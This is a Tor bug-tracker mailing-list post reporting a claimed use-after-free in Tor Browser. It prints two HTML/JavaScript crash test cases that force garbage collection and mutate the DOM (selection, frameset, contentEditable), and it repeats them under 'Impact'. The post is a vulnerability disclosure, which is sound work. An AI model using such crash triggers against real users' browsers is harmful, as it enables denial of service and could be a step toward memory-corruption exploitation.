[tor-bugs] #26705 [Core Tor/Tor]: BUG Report ! Use after Free Vulnerability
Tor Bug Tracker & Wiki
blackhole at torproject.org
Mon Jul 9 14:57:21 UTC 2018
#26705: BUG Report ! Use after Free Vulnerability
------------------------------+------------------------------
Reporter: t4rkd3vilz | Owner: (none)
Type: project | Status: new
Priority: Very High | Milestone:
Component: Core Tor/Tor | Version: Tor: unspecified
Severity: Normal | Keywords:
Actual Points: | Parent ID:
Points: | Reviewer:
Sponsor: |
------------------------------+------------------------------
hello,
tor browser click new tab.
a new tab open html in code :
<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)');
}
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>
and open second tab.
Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); }
catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>
a result: Tor browser CRASHH...
Impact
hello,
tor browser click new tab.
a new tab open html in code :
<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)');
}
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>
and open second tab.
Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); }
catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>
a result: Tor browser CRASHH...
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/26705>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
More information about the tor-bugs
mailing list